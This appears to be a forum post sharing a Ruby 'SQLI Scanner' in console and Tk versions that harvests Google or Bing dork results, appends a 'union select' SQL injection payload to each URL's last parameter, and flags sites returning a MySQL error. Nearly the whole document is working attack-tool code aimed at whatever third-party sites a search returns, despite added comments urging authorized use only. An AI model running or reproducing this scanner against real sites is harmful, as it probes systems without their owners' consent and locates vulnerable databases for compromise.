Un script sencillo en Ruby que, a partir de un dork en Google o Bing, recoge páginas con parámetros GET y les añade una carga `union select` para detectar posibles inyecciones SQL. Los modos de escaneo envían peticiones a cada sitio encontrado: úsalos únicamente contra sistemas para los que tengas autorización.

Versión de consola:
#!/usr/bin/env ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "openssl"

# Functions 

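def toma(web)
	# GET `web` over HTTP(S) with open-uri and return the body as a String.
	# Returns the literal "Error" on any failure: callers grep the result as
	# page text, so a sentinel is returned instead of raising.
	#
	# `web` is built from scraped search results, i.e. it is untrusted. The
	# original passed it to Kernel#open: a value beginning with "|" would have
	# been executed as a shell command, and on Ruby >= 3.0 Kernel#open no longer
	# dispatches to open-uri at all, so every request silently became "Error".
	# Parsing to a URI first and using OpenURI::OpenRead#read avoids both.
	begin
		uri = URI.parse(web)
		return "Error" unless uri.is_a?(URI::HTTP) # http/https only: no ftp://, no local paths
		return uri.read("User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0")
	rescue
		return "Error"
	end
end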


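def toma_ssl(web)
	# GET `web` over TLS with Net::HTTP and return the response body.
	# Unlike `toma`, errors propagate to the caller (no "Error" sentinel).
	#
	# The original set verify_mode = VERIFY_NONE, which disabled certificate
	# checking: anyone on the path could impersonate the search engine and feed
	# the scanner arbitrary "results". VERIFY_PEER against the system CA store
	# is used instead; a bad certificate now raises OpenSSL::SSL::SSLError.
	uri = URI.parse(web)
	nave = Net::HTTP.new(uri.host, uri.port)
	nave.use_ssl = true
	nave.verify_mode = OpenSSL::SSL::VERIFY_PEER
	headers = {"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}
	return nave.get(uri.request_uri, headers).body
end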


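def tomar(web,arg)
	# POST the body `arg` (a form-encoded String) to `web` and return the
	# response body, or the literal "Error" on any failure. Not called anywhere
	# in this script; kept for API parity.
	#
	# Fixes over the original: an https:// URL was sent in clear text to the
	# https port (use_ssl was never set); `uri.path` is "" for "http://host",
	# which Net::HTTP rejects, and the query string was dropped. `request_uri`
	# yields "/" for an empty path and keeps the query.
	begin
		headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
		uri = URI(web)
		return "Error" unless uri.is_a?(URI::HTTP) # untrusted input: http/https only
		http = Net::HTTP.new(uri.host, uri.port)
		http.use_ssl = (uri.scheme == "https")
		return http.post(uri.request_uri, arg, headers).body
	rescue
		return "Error"
	end
end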

def cortar(pages)
	# Trim every URL in `pages` (nested arrays allowed) to just past its last
	# "=": "http://h/p.php?id=1&x=2" -> "http://h/p.php?id=1&x=". The capture
	# is greedy, so the cut lands after the LAST "=" of the matched line.
	# Entries without "=" are dropped; duplicates and order are preserved.
	pages.flatten.each_with_object([]) do |page, recortadas|
		corte = page.match(/(.*)=(.*)/)
		recortadas << "#{corte[1]}=" if corte
	end
end


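def google(dork,pages)
	# Scrape result links from `pages` Google result pages for `dork`.
	# Returns a de-duplicated Array of URLs (may be empty). `pages` may be a
	# numeric String (ARGV / Tk entry) or an Integer; "" counts as 0.
	#
	# Fixes over the original: `sub` replaced only the first space in the dork
	# (`gsub` now); the page count was iterated as a String range, which for a
	# non-numeric value walked hundreds of "pages" (now Integer(); garbage raises
	# ArgumentError); and URI::decode was removed in Ruby 3.0 (the equivalent
	# URI::DEFAULT_PARSER.unescape is used).
	#
	# NOTE(review): the markup matched ("r"><a href="/url?q=...&sa=...) is
	# Google's 2015 HTML and is unlikely to match current pages. Offsets start
	# at 10, so the first result page (start=0) is never requested -- kept
	# as-is; confirm that is intended.
	links = []
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	total.times do
		contador+=10
		code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
		paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
		paginas.flatten.each do |pagina|
			if pagina=~/url\?q=(.*)&sa/
				links.push(URI::DEFAULT_PARSER.unescape($1))
			end
		end
	end
	return links.uniq
end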

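def google_recursive(dork,pages)
	# Fallback scraper used when `google` finds nothing: pulls every URI out of
	# the result HTML with URI.extract and keeps the target of each Google
	# cache link ("...cache:<id>:<host/path>+..."), rebuilt as an http:// URL.
	# Returns a de-duplicated Array (may be empty). `pages` is handled as in
	# `google`: numeric String or Integer, "" counts as 0.
	#
	# Fixes: `gsub` instead of `sub` (all spaces), Integer page count instead
	# of a String range, and URI::DEFAULT_PARSER.unescape instead of
	# URI::decode, which Ruby 3.0 removed. URI.extract is itself marked
	# obsolete (warns under -w) but is still available.
	#
	# NOTE(review): offsets start at 10, so the first result page is never
	# fetched -- kept as-is; confirm that is intended.
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	guardo = []
	total.times do
		contador+=10
		url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
		code = toma_ssl(url)
		URI.extract(code).each do |link|
			if link=~/cache:(.*?):(.*?)\+/
				guardo.push(URI::DEFAULT_PARSER.unescape("http://"+$2))
			end
		end
	end
	return guardo.uniq
end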

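def bing(dork,pages)
	# Scrape result links from `pages` Bing result pages for `dork`, reading the
	# <h2><a href="..."> and <h3><a href="..."> anchors and dropping Bing's own
	# redirect host (778802.r.msn.com). Plain HTTP via `toma`, which returns the
	# String "Error" on failure, so a failed page simply yields no links.
	# Returns a de-duplicated Array (may be empty). `pages` is handled as in
	# `google`: numeric String or Integer, "" counts as 0.
	#
	# Fixes: `gsub` instead of `sub` (only the first space was replaced),
	# Integer page count instead of a String range, URI::DEFAULT_PARSER.unescape
	# instead of URI::decode (removed in Ruby 3.0), and one loop over both
	# anchor patterns instead of two copies of the same code.
	#
	# NOTE(review): offsets start at 10, so the first result page is never
	# requested -- kept as-is; confirm that is intended.
	guardo = []
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	total.times do
		contador+=10
		code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
		[/<h2><a href="(.*?)" h/, /<h3><a href="(.*?)" h/].each do |patron|
			code.scan(patron).flatten.each do |link|
				link_final = URI::DEFAULT_PARSER.unescape(link)
				guardo.push(link_final) unless link_final=~/http:\/\/778802\.r\.msn\.com\//
			end
		end
	end
	return guardo.uniq
end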

def uso
	# Print the command-line usage: syntax, the four options and one example.
	lineas = [
		"\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n",
		"-search_bing : Find in Bing\n",
		"-search_google : Find in Google\n",
		"-scan_bing : Find SQLI in Bing\n",
		"-scan_google : Find SQLI in Google\n",
		"\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
	]
	print(*lineas)
end

def head
	# Print the program banner.
	titulo = "SQLI Scanner 0.4"
	print "\n\n-- == #{titulo} == --\n\n"
end

def copyright
	# Print the author/copyright footer.
	autor = "(C) Doddy Hackman 2015"
	print "\n\n-- == #{autor} == --\n\n"
end

# --- Entry point -------------------------------------------------------------
# Usage: ruby scanner.rb <option> <dork> <pages>
#   -search_bing / -search_google : list the result URLs for the dork
#   -scan_bing   / -scan_google   : additionally probe each URL for SQLi
# The -scan_* modes send a request carrying an injected payload to every
# third-party site the search returns. Run them only against hosts you are
# authorized to test.
opcion = ARGV[0]
dork = ARGV[1]
pages  = ARGV[2]   # page count, passed through to the search helpers as the raw String

head()

# ARGV entries are nil when missing; an empty-string argument passes this check.
if !opcion or !dork or !pages
	uso()
else
	
	if opcion=="-search_bing"
		
		print "\n[+] Searching in Bing ...\n\n"
		
		links = bing(dork,pages)

		print "[+] Pages Count : "+links.count.to_s+"\n\n"

		if links.count.to_s=="0"   # same as links.empty?
			print "[-] Links not found\n"
		end

		links.flatten.each do |link|
			print "[+] Link : "+link+"\n"
		end
	
		print "\n[+] Finished\n"

	elsif opcion=="-search_google"
		
		print "\n[+] Searching in Google ...\n\n"
		
		links = google(dork,pages)

		# Second attempt with the cache-link scraper when the first markup match found nothing.
		if links.count.to_s=="0"
			print "[+] Searching in Google again ...\n\n"
			links = google_recursive(dork,pages)
		end

		print "[+] Pages Count : "+links.count.to_s
	
		if links.count.to_s=="0"
			print "[-] Links not found"
		end

		links.flatten.each do |link|
			print "[+] Link : "+link+"\n"
		end
		
		print "\n[+] Finished\n"

	elsif opcion=="-scan_bing"
		
		print "\n[+] Searching in Bing ...\n\n"
		
		# `cortar` trims each URL to just after its last "=", so the probe below
		# replaces that parameter's value.
		links = cortar(bing(dork,pages))

		print "[+] Pages Count : "+links.count.to_s+"\n\n"

		if links.count.to_s=="0"
			print "[-] Links not found\n"
		end

		# Only MySQL's column-count error text is matched; any other response
		# (other DBMS, generic error page, blocked request) is reported as [FAIL].
		# `toma` already returns "Error" instead of raising, so the rescue rarely
		# triggers. "\a" rings the terminal bell on a hit.
		# NOTE(review): this loop is identical to the one under -scan_google and
		# could be a single helper.
		links.flatten.each do |link|
			print "[+] Link : "+link
			begin
				url = toma(link + "-1+union+select+1--")
				if url=~/The used SELECT statements have a different number of columns/
					print " [OK]\n\a\a"
				else
					print " [FAIL]\n"
				end
			rescue
				print " [FAIL]\n"
			end
		end
	
		print "\n[+] Finished\n"
		
	elsif opcion=="-scan_google"
		
		print "\n[+] Searching in Google ...\n\n"
		
		links = cortar(google(dork,pages))

		# Second attempt with the cache-link scraper when the first markup match found nothing.
		if links.count.to_s=="0"
			print "[+] Searching in Google again ...\n\n"
			links = cortar(google_recursive(dork,pages))
		end

		print "[+] Pages Count : "+links.count.to_s+"\n\n"
	
		if links.count.to_s=="0"
			print "[-] Links not found"
		end

		# Same probe as -scan_bing: one MySQL error string decides [OK]/[FAIL].
		links.flatten.each do |link|
			print "[+] Link : "+link
			begin
				url = toma(link + "-1+union+select+1--")
				if url=~/The used SELECT statements have a different number of columns/
					print " [OK]\n\a\a"
				else
					print " [FAIL]\n"
				end
			rescue
				print " [FAIL]\n"
			end
		end
	
		print "\n[+] Finished\n"
	else
		print "[-] Bad Option"
	end
end

copyright()


#The End ?
Versión Tk para Google:
#!/usr/bin/env ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions 

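def toma(web)
	# GET `web` over HTTP(S) with open-uri and return the body as a String.
	# Returns the literal "Error" on any failure: callers grep the result as
	# page text, so a sentinel is returned instead of raising.
	#
	# `web` is built from scraped search results, i.e. it is untrusted. The
	# original passed it to Kernel#open: a value beginning with "|" would have
	# been executed as a shell command, and on Ruby >= 3.0 Kernel#open no longer
	# dispatches to open-uri at all, so every request silently became "Error".
	# Parsing to a URI first and using OpenURI::OpenRead#read avoids both.
	begin
		uri = URI.parse(web)
		return "Error" unless uri.is_a?(URI::HTTP) # http/https only: no ftp://, no local paths
		return uri.read("User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0")
	rescue
		return "Error"
	end
end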


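def toma_ssl(web)
	# GET `web` over TLS with Net::HTTP and return the response body.
	# Unlike `toma`, errors propagate to the caller (no "Error" sentinel).
	#
	# The original set verify_mode = VERIFY_NONE, which disabled certificate
	# checking: anyone on the path could impersonate the search engine and feed
	# the scanner arbitrary "results". VERIFY_PEER against the system CA store
	# is used instead; a bad certificate now raises OpenSSL::SSL::SSLError.
	uri = URI.parse(web)
	nave = Net::HTTP.new(uri.host, uri.port)
	nave.use_ssl = true
	nave.verify_mode = OpenSSL::SSL::VERIFY_PEER
	headers = {"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}
	return nave.get(uri.request_uri, headers).body
end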


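def tomar(web,arg)
	# POST the body `arg` (a form-encoded String) to `web` and return the
	# response body, or the literal "Error" on any failure. Not called anywhere
	# in this script; kept for API parity.
	#
	# Fixes over the original: an https:// URL was sent in clear text to the
	# https port (use_ssl was never set); `uri.path` is "" for "http://host",
	# which Net::HTTP rejects, and the query string was dropped. `request_uri`
	# yields "/" for an empty path and keeps the query.
	begin
		headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
		uri = URI(web)
		return "Error" unless uri.is_a?(URI::HTTP) # untrusted input: http/https only
		http = Net::HTTP.new(uri.host, uri.port)
		http.use_ssl = (uri.scheme == "https")
		return http.post(uri.request_uri, arg, headers).body
	rescue
		return "Error"
	end
end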

def cortar(pages)
	# Trim every URL in `pages` (nested arrays allowed) to just past its last
	# "=": "http://h/p.php?id=1&x=2" -> "http://h/p.php?id=1&x=". The capture
	# is greedy, so the cut lands after the LAST "=" of the matched line.
	# Entries without "=" are dropped; duplicates and order are preserved.
	pages.flatten.each_with_object([]) do |page, recortadas|
		corte = page.match(/(.*)=(.*)/)
		recortadas << "#{corte[1]}=" if corte
	end
end


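def google(dork,pages)
	# Scrape result links from `pages` Google result pages for `dork`.
	# Returns a de-duplicated Array of URLs (may be empty). `pages` may be a
	# numeric String (ARGV / Tk entry) or an Integer; "" counts as 0.
	#
	# Fixes over the original: `sub` replaced only the first space in the dork
	# (`gsub` now); the page count was iterated as a String range, which for a
	# non-numeric value walked hundreds of "pages" (now Integer(); garbage raises
	# ArgumentError); and URI::decode was removed in Ruby 3.0 (the equivalent
	# URI::DEFAULT_PARSER.unescape is used).
	#
	# NOTE(review): the markup matched ("r"><a href="/url?q=...&sa=...) is
	# Google's 2015 HTML and is unlikely to match current pages. Offsets start
	# at 10, so the first result page (start=0) is never requested -- kept
	# as-is; confirm that is intended.
	links = []
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	total.times do
		contador+=10
		code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
		paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
		paginas.flatten.each do |pagina|
			if pagina=~/url\?q=(.*)&sa/
				links.push(URI::DEFAULT_PARSER.unescape($1))
			end
		end
	end
	return links.uniq
end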

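def google_recursive(dork,pages)
	# Fallback scraper used when `google` finds nothing: pulls every URI out of
	# the result HTML with URI.extract and keeps the target of each Google
	# cache link ("...cache:<id>:<host/path>+..."), rebuilt as an http:// URL.
	# Returns a de-duplicated Array (may be empty). `pages` is handled as in
	# `google`: numeric String or Integer, "" counts as 0.
	#
	# Fixes: `gsub` instead of `sub` (all spaces), Integer page count instead
	# of a String range, and URI::DEFAULT_PARSER.unescape instead of
	# URI::decode, which Ruby 3.0 removed. URI.extract is itself marked
	# obsolete (warns under -w) but is still available.
	#
	# NOTE(review): offsets start at 10, so the first result page is never
	# fetched -- kept as-is; confirm that is intended.
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	guardo = []
	total.times do
		contador+=10
		url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
		code = toma_ssl(url)
		URI.extract(code).each do |link|
			if link=~/cache:(.*?):(.*?)\+/
				guardo.push(URI::DEFAULT_PARSER.unescape("http://"+$2))
			end
		end
	end
	return guardo.uniq
end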

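def bing(dork,pages)
	# Scrape result links from `pages` Bing result pages for `dork`, reading the
	# <h2><a href="..."> and <h3><a href="..."> anchors and dropping Bing's own
	# redirect host (778802.r.msn.com). Plain HTTP via `toma`, which returns the
	# String "Error" on failure, so a failed page simply yields no links.
	# Returns a de-duplicated Array (may be empty). `pages` is handled as in
	# `google`: numeric String or Integer, "" counts as 0.
	#
	# Fixes: `gsub` instead of `sub` (only the first space was replaced),
	# Integer page count instead of a String range, URI::DEFAULT_PARSER.unescape
	# instead of URI::decode (removed in Ruby 3.0), and one loop over both
	# anchor patterns instead of two copies of the same code.
	#
	# NOTE(review): offsets start at 10, so the first result page is never
	# requested -- kept as-is; confirm that is intended.
	guardo = []
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	total.times do
		contador+=10
		code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
		[/<h2><a href="(.*?)" h/, /<h3><a href="(.*?)" h/].each do |patron|
			code.scan(patron).flatten.each do |link|
				link_final = URI::DEFAULT_PARSER.unescape(link)
				guardo.push(link_final) unless link_final=~/http:\/\/778802\.r\.msn\.com\//
			end
		end
	end
	return guardo.uniq
end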

#

# --- Tk front end (Google) ---------------------------------------------------
# A fixed 300x320 window: a Dork entry, a Pages entry, a text "console" and a
# Search button. The search and the probes run inside the button callback
# with no thread, so the window most likely stays unresponsive until every
# request has finished. The probe sends an injected payload to every
# third-party site the search returns: use it only against hosts you are
# authorized to test.
window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "    Dork : "
	place('relx'=>"0.1",'rely'=>"0.1")
end

# Entry widget read by the Search callback below.
dork = TkEntry.new(window){
	background "black"
	foreground "green"
	width 25
	place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "    Pages : "
	place('relx'=>"0.1",'rely'=>"0.2")
end

# Page count entry; its raw String is handed to the search helpers.
pages = TkEntry.new(window){
	background "black"
	foreground "green"
	width 25
	place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "Console"
	place('relx'=>0.4,'rely'=>0.3)
end

# Output area; every message below is appended at "end".
console =TkText.new(window) do
	background "black"
	foreground "green"
	width 30
	height 9
	place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
	text "Search"
    background "black"
	foreground "green"
	width 17
	activebackground "green"
	highlightbackground  "green"
	command proc{
	
		# NOTE(review): these two lines reassign the closed-over widget
		# variables `dork` and `pages` with Strings, so a second click on
		# Search raises NoMethodError (String has no `value`). Reading into
		# fresh locals (e.g. `texto = dork.value.to_s`) would fix it.
		dork = dork.value.to_s
		pages = pages.value.to_s

		console.insert("end",  "[+] Searching in Google ...\n\n")
		
		# `cortar` trims each URL to just after its last "=", so the probe
		# replaces that parameter's value.
		links = cortar(google(dork,pages))

		# Second attempt with the cache-link scraper when the first match found nothing.
		if links.count.to_s=="0"
			console.insert("end",  "[+] Searching in Google again ...\n\n")
			links = cortar(google_recursive(dork,pages))
		end

		console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
	
		if links.count.to_s=="0"   # same as links.empty?
			console.insert("end", "[-] Links not found")
		end

		# Only MySQL's column-count error text is matched; any other response
		# (other DBMS, generic error page, blocked request) is reported as
		# [FAIL]. `toma` already returns "Error" instead of raising, so the
		# rescue rarely triggers. "\a" rings the bell on a hit.
		links.flatten.each do |link|
			console.insert("end", "[+] Link : "+link)
			begin
				url = toma(link + "-1+union+select+1--")
				if url=~/The used SELECT statements have a different number of columns/
					console.insert("end"," [OK]\n\a\a")
				else
					console.insert("end"," [FAIL]\n")
				end
			rescue
				console.insert("end", " [FAIL]\n")
			end
		end
		
		console.insert("end",  "\n[+] Finished")
		
	}
	place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?
Una imagen :

Imagen


Versión Tk para Bing:
#!/usr/bin/env ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions 

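def toma(web)
	# GET `web` over HTTP(S) with open-uri and return the body as a String.
	# Returns the literal "Error" on any failure: callers grep the result as
	# page text, so a sentinel is returned instead of raising.
	#
	# `web` is built from scraped search results, i.e. it is untrusted. The
	# original passed it to Kernel#open: a value beginning with "|" would have
	# been executed as a shell command, and on Ruby >= 3.0 Kernel#open no longer
	# dispatches to open-uri at all, so every request silently became "Error".
	# Parsing to a URI first and using OpenURI::OpenRead#read avoids both.
	begin
		uri = URI.parse(web)
		return "Error" unless uri.is_a?(URI::HTTP) # http/https only: no ftp://, no local paths
		return uri.read("User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0")
	rescue
		return "Error"
	end
end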


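def toma_ssl(web)
	# GET `web` over TLS with Net::HTTP and return the response body.
	# Unlike `toma`, errors propagate to the caller (no "Error" sentinel).
	#
	# The original set verify_mode = VERIFY_NONE, which disabled certificate
	# checking: anyone on the path could impersonate the search engine and feed
	# the scanner arbitrary "results". VERIFY_PEER against the system CA store
	# is used instead; a bad certificate now raises OpenSSL::SSL::SSLError.
	uri = URI.parse(web)
	nave = Net::HTTP.new(uri.host, uri.port)
	nave.use_ssl = true
	nave.verify_mode = OpenSSL::SSL::VERIFY_PEER
	headers = {"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}
	return nave.get(uri.request_uri, headers).body
end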


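def tomar(web,arg)
	# POST the body `arg` (a form-encoded String) to `web` and return the
	# response body, or the literal "Error" on any failure. Not called anywhere
	# in this script; kept for API parity.
	#
	# Fixes over the original: an https:// URL was sent in clear text to the
	# https port (use_ssl was never set); `uri.path` is "" for "http://host",
	# which Net::HTTP rejects, and the query string was dropped. `request_uri`
	# yields "/" for an empty path and keeps the query.
	begin
		headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
		uri = URI(web)
		return "Error" unless uri.is_a?(URI::HTTP) # untrusted input: http/https only
		http = Net::HTTP.new(uri.host, uri.port)
		http.use_ssl = (uri.scheme == "https")
		return http.post(uri.request_uri, arg, headers).body
	rescue
		return "Error"
	end
end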

def cortar(pages)
	# Trim every URL in `pages` (nested arrays allowed) to just past its last
	# "=": "http://h/p.php?id=1&x=2" -> "http://h/p.php?id=1&x=". The capture
	# is greedy, so the cut lands after the LAST "=" of the matched line.
	# Entries without "=" are dropped; duplicates and order are preserved.
	pages.flatten.each_with_object([]) do |page, recortadas|
		corte = page.match(/(.*)=(.*)/)
		recortadas << "#{corte[1]}=" if corte
	end
end


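def google(dork,pages)
	# Scrape result links from `pages` Google result pages for `dork`.
	# Returns a de-duplicated Array of URLs (may be empty). `pages` may be a
	# numeric String (ARGV / Tk entry) or an Integer; "" counts as 0.
	# Not used by this (Bing) front end; kept for parity with the other scripts.
	#
	# Fixes over the original: `sub` replaced only the first space in the dork
	# (`gsub` now); the page count was iterated as a String range, which for a
	# non-numeric value walked hundreds of "pages" (now Integer(); garbage raises
	# ArgumentError); and URI::decode was removed in Ruby 3.0 (the equivalent
	# URI::DEFAULT_PARSER.unescape is used).
	#
	# NOTE(review): the markup matched ("r"><a href="/url?q=...&sa=...) is
	# Google's 2015 HTML and is unlikely to match current pages. Offsets start
	# at 10, so the first result page (start=0) is never requested -- kept
	# as-is; confirm that is intended.
	links = []
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	total.times do
		contador+=10
		code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
		paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
		paginas.flatten.each do |pagina|
			if pagina=~/url\?q=(.*)&sa/
				links.push(URI::DEFAULT_PARSER.unescape($1))
			end
		end
	end
	return links.uniq
end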

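def google_recursive(dork,pages)
	# Fallback scraper used when `google` finds nothing: pulls every URI out of
	# the result HTML with URI.extract and keeps the target of each Google
	# cache link ("...cache:<id>:<host/path>+..."), rebuilt as an http:// URL.
	# Returns a de-duplicated Array (may be empty). `pages` is handled as in
	# `google`: numeric String or Integer, "" counts as 0. Not used by this
	# (Bing) front end; kept for parity with the other scripts.
	#
	# Fixes: `gsub` instead of `sub` (all spaces), Integer page count instead
	# of a String range, and URI::DEFAULT_PARSER.unescape instead of
	# URI::decode, which Ruby 3.0 removed. URI.extract is itself marked
	# obsolete (warns under -w) but is still available.
	#
	# NOTE(review): offsets start at 10, so the first result page is never
	# fetched -- kept as-is; confirm that is intended.
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	guardo = []
	total.times do
		contador+=10
		url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
		code = toma_ssl(url)
		URI.extract(code).each do |link|
			if link=~/cache:(.*?):(.*?)\+/
				guardo.push(URI::DEFAULT_PARSER.unescape("http://"+$2))
			end
		end
	end
	return guardo.uniq
end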

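def bing(dork,pages)
	# Scrape result links from `pages` Bing result pages for `dork`, reading the
	# <h2><a href="..."> and <h3><a href="..."> anchors and dropping Bing's own
	# redirect host (778802.r.msn.com). Plain HTTP via `toma`, which returns the
	# String "Error" on failure, so a failed page simply yields no links.
	# Returns a de-duplicated Array (may be empty). `pages` is handled as in
	# `google`: numeric String or Integer, "" counts as 0.
	#
	# Fixes: `gsub` instead of `sub` (only the first space was replaced),
	# Integer page count instead of a String range, URI::DEFAULT_PARSER.unescape
	# instead of URI::decode (removed in Ruby 3.0), and one loop over both
	# anchor patterns instead of two copies of the same code.
	#
	# NOTE(review): offsets start at 10, so the first result page is never
	# requested -- kept as-is; confirm that is intended.
	guardo = []
	dork = dork.gsub(/ /,"+")
	total = pages.to_s.strip
	total = total.empty? ? 0 : Integer(total, 10)
	contador = 0
	total.times do
		contador+=10
		code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
		[/<h2><a href="(.*?)" h/, /<h3><a href="(.*?)" h/].each do |patron|
			code.scan(patron).flatten.each do |link|
				link_final = URI::DEFAULT_PARSER.unescape(link)
				guardo.push(link_final) unless link_final=~/http:\/\/778802\.r\.msn\.com\//
			end
		end
	end
	return guardo.uniq
end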

#

# --- Tk front end (Bing) -----------------------------------------------------
# A fixed 300x320 window: a Dork entry, a Pages entry, a text "console" and a
# Search button. The search and the probes run inside the button callback
# with no thread, so the window most likely stays unresponsive until every
# request has finished. The probe sends an injected payload to every
# third-party site the search returns: use it only against hosts you are
# authorized to test.
window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "    Dork : "
	place('relx'=>"0.1",'rely'=>"0.1")
end

# Entry widget read by the Search callback below.
dork = TkEntry.new(window){
	background "black"
	foreground "green"
	width 25
	place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "    Pages : "
	place('relx'=>"0.1",'rely'=>"0.2")
end

# Page count entry; its raw String is handed to the search helper.
pages = TkEntry.new(window){
	background "black"
	foreground "green"
	width 25
	place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "Console"
	place('relx'=>0.4,'rely'=>0.3)
end

# Output area; every message below is appended at "end".
console =TkText.new(window) do
	background "black"
	foreground "green"
	width 30
	height 9
	place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
	text "Search"
    background "black"
	foreground "green"
	width 17
	activebackground "green"
	highlightbackground  "green"
	command proc{
	
		# NOTE(review): these two lines reassign the closed-over widget
		# variables `dork` and `pages` with Strings, so a second click on
		# Search raises NoMethodError (String has no `value`). Reading into
		# fresh locals (e.g. `texto = dork.value.to_s`) would fix it.
		dork = dork.value.to_s
		pages = pages.value.to_s

		console.insert("end", "[+] Searching in Bing ...\n\n")
		
		# `cortar` trims each URL to just after its last "=", so the probe
		# replaces that parameter's value.
		links = cortar(bing(dork,pages))

		console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

		if links.count.to_s=="0"   # same as links.empty?
			console.insert("end","[-] Links not found\n")
		end

		# Only MySQL's column-count error text is matched; any other response
		# (other DBMS, generic error page, blocked request) is reported as
		# [FAIL]. `toma` already returns "Error" instead of raising, so the
		# rescue rarely triggers. "\a" rings the bell on a hit.
		links.flatten.each do |link|
			console.insert("end", "[+] Link : "+link)
			begin
				url = toma(link + "-1+union+select+1--")
				if url=~/The used SELECT statements have a different number of columns/
					console.insert("end"," [OK]\n\a\a")
				else
					console.insert("end", " [FAIL]\n")
				end
			rescue
				console.insert("end"," [FAIL]\n")
			end
		end
		
		console.insert("end",  "\n[+] Finished")
		
	}
	place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?
Una imagen :

Imagen


Eso es todo.
